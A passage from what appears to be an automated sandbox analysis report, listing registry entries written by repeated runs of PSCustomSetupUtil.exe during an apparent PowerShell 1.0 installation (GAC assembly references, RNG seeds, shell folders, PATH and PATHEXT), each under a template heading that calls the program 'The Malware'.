"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3060 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD AF 9D 82 F3 09 6F FF EB 47 C9 9C E1 1E 84 EE"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "AE 4E C9 39 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"

The process PSCustomSetupUtil.exe:3308 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 53 85 76 D3 99 75 AD 90 91 EC 16 28 8D 1A D2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "70 67 06 3B 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:2944 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 B9 68 9F 2C 15 31 FD B9 B9 52 52 EC 32 F9 A1"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "04 43 1B 39 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:3008 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 D1 62 70 6E B3 FC 23 13 B6 38 BC 54 DB B7 EF"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "06 7A 73 39 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:3348 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B AE A1 31 AD D4 37 65 BB 41 1F 2E 34 D3 82 39"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "5C C8 27 3B 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:3432 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 35 0A D5 C7 55 C7 F6 07 41 F9 B2 12 DD C1 BD"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C6 88 89 3B 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"

The process PSCustomSetupUtil.exe:3100 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 00 B2 FB 79 66 FF A5 F8 72 E4 35 A7 4D 10 D9"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "02 39 F4 39 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:3124 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 99 D7 DA D5 1B 63 CA 38 FA 95 ED B6 1A 82 3B"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "FC C0 1C 3A 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"

The process PSCustomSetupUtil.exe:3184 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 ED 33 F4 6E F7 84 5A 3A C6 87 78 2E A3 48 61"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "4A 33 70 3A 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3892 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 95 A8 87 AF ED 16 C4 6F F1 E6 E2 B1 AA 45 9E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3992 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 CE 33 AF 25 BF 52 6E 05 37 7A 72 43 E8 AC 4F"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "7C DE 48 3E 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:3872 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0A 1F 07 05 79 5D 17 9C D2 1D A6 0B 45 A3 35 DF"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3404 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B DE B0 40 2C 3D 1E CC 69 75 20 DF E2 09 5A 50"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "34 8A 6A 3B 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:3284 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 6F C0 38 5C C6 04 9B B7 DD 73 53 77 9C 15 0E"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "84 06 E5 3A 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:3248 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 1E 0F 0B 1F B3 7B 55 07 82 98 08 CD 47 E9 AD"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "3E 43 C1 3A 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "197"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "198"
"StoreChangeIDFor64BitProcesses" = "176"
"StoreChangeIDFor32BitProcesses" = "197"

The process PSCustomSetupUtil.exe:4052 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 84 2B B7 70 C5 A7 95 7C 10 C9 EA 77 D3 28 1A"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "46 79 84 3E 31 74 D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:3224 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 BE 1D 50 51 EC C1 26 08 EE 71 1E 07 20 1A A6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "44 BB 98 3A 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:4076 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 69 3D 36 4F FE EF 0C 8F 5F C7 3B 75 19 E5 72"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "7E 15 A1 3E 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:3372 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 55 5F A2 E3 97 6A C9 67 1E 1F BE 17 07 70 BB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "48 29 49 3B 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process PSCustomSetupUtil.exe:3032 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 D9 FD 7C C3 D7 5B A7 C9 9A 44 C3 DF 31 E2 7A"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "5A 64 9E 39 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:3964 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 17 A5 6A 23 81 40 6A 67 61 77 65 F6 6A 26 D7"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "EA DF 29 3E 31 74 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"

The process PSCustomSetupUtil.exe:3156 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 F2 3A 25 53 5D 88 71 6C D3 85 E7 F1 0F F5 93"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "50 AB 47 3A 31 74 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

